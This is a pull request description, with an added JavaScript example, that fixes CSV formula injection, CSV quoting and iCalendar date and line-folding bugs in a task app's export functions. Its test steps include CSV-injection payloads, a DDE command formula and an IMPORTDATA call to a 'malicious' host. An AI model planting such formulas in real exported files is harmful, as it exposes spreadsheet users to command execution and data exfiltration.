Fix: CSV Injection and Calendar Formatting Bugs#1003
Open
BinaryBandit-07 wants to merge 1 commit into
Title: Fix: Resolve CSV Injection vulnerability, CSV formatting corruption, and invalid ICS generation
Description:
This PR/Issue addresses a critical security vulnerability (CSV Injection) and several severe formatting bugs in the data export utilities (downloadData and downloadCalendar). These bugs currently allow malicious code execution via spreadsheet applications and cause exported .csv and .ics files to become corrupted and unusable depending on user input.
The Problem: The downloadData function does not sanitize user inputs (like title or notes) before exporting them to CSV. If a user inputs a string starting with =, +, -, @, \t, or \r (e.g., =cmd|' /C calc'!A0), spreadsheet software (Excel, Google Sheets) will execute it as a formula. This exposes users who download the CSV to arbitrary code execution or data exfiltration.
The Fix: Implemented an escapeCsvValue helper that prepends a single quote (') to any string starting with a dangerous character, forcing spreadsheet clients to evaluate the cell as plain text.
The Problem: The CSV export simply joins fields with a comma (.join(',')). If user-generated fields (like task.title) contain commas, newlines, or quotes, the CSV row breaks entirely, shifting subsequent columns into the wrong places.
The Fix: The new escapeCsvValue helper wraps any string containing commas, newlines, or quotes in double quotes (""), properly escaping them according to standard CSV RFC 4180 specifications.
The Problem:
* buildCalendarIcs checks if task.due_at exists, but does not verify if it is a valid date. Parsing an invalid date string results in Invalid Date, which outputs NaNNaNNaNTNaNNaNNaNZ in the .ics file. This causes calendar clients (Google Calendar, Apple Calendar) to silently fail or reject the file.
* The current ICS generator does not respect the iCalendar specification (RFC 5545), which strictly limits line lengths to 75 octets. Long task descriptions or titles will currently break strict calendar parsers.
The Fix:
* Added a strict !isNaN(new Date(task.due_at).getTime()) check before processing events.
* Implemented a foldIcsLine utility that splits strings exceeding 75 characters and inserts the required CRLF + Space for continuation lines.
Steps to Test:
Create a task with the title: =1+1 or =IMPORTDATA("http://malicious-site.com")
Create a task with the title: Read Chapter 1, 2, and 3
Create a task with an invalid date string in the database.
Download the CSV and verify that formulas are not executed (prepended with ') and commas do not create extra columns.
Download the ICS calendar and verify that NaN timestamps do not exist, and long description lines are properly folded with a space on the next line.
Checklist:
[x] Fixed CSV Injection vulnerability.
[x] Fixed CSV formatting for commas, quotes, and newlines.
[x] Fixed NaN timestamp generation in ICS export.
[x] Added RFC 5545 compliant line-folding for ICS files.
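As an added example, not code from this PR or the project, here is one JavaScript implementation of the helpers the description names (escapeCsvValue, foldIcsLine, the due_at validity check); the function bodies, the toCsvRow and toIcsTimestamp names, and the byte-aware folding are my assumptions.

```javascript
// Added example (not the project's code). Shows the three fixes the PR describes:
// formula-trigger neutralisation + RFC 4180 quoting, RFC 5545 line folding,
// and rejecting Invalid Date before it reaches a DTSTART/DTEND value.

// Leading characters that spreadsheets treat as a formula or field separator.
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

// Prepend an apostrophe to formula triggers, then quote per RFC 4180
// (wrap in double quotes when the value holds a comma, quote or line break,
// doubling any embedded double quote).
function escapeCsvValue(value) {
  let s = value == null ? '' : String(value);
  if (s.length > 0 && FORMULA_TRIGGERS.has(s[0])) {
    s = "'" + s; // cell is now evaluated as plain text
  }
  if (/[",\r\n]/.test(s)) {
    s = '"' + s.replace(/"/g, '""') + '"';
  }
  return s;
}

function toCsvRow(fields) {
  return fields.map(escapeCsvValue).join(',');
}

// RFC 5545 section 3.1: a content line longer than 75 octets is split into
// several lines, each continuation line beginning with a single space.
// The 75-octet limit includes that leading space, and a multi-byte UTF-8
// sequence must never be cut in half (assumption: input is a JS string).
function foldIcsLine(line) {
  const LIMIT = 75;
  const bytes = Buffer.from(line, 'utf8');
  if (bytes.length <= LIMIT) return line;
  const parts = [];
  let i = 0;
  while (i < bytes.length) {
    const width = parts.length === 0 ? LIMIT : LIMIT - 1;
    let end = Math.min(i + width, bytes.length);
    // back up while the byte at the split point is a UTF-8 continuation byte
    while (end < bytes.length && (bytes[end] & 0xc0) === 0x80) end--;
    parts.push(bytes.subarray(i, end).toString('utf8'));
    i = end;
  }
  return parts.join('\r\n ');
}

// Return an ICS UTC timestamp (YYYYMMDDTHHMMSSZ) or null for an invalid date,
// so callers skip the event instead of writing NaNNaNNaNTNaNNaNNaNZ.
function toIcsTimestamp(dueAt) {
  const d = new Date(dueAt);
  if (Number.isNaN(d.getTime())) return null;
  return d.toISOString().replace(/[-:]/g, '').replace(/\.\d{3}Z$/, 'Z');
}
```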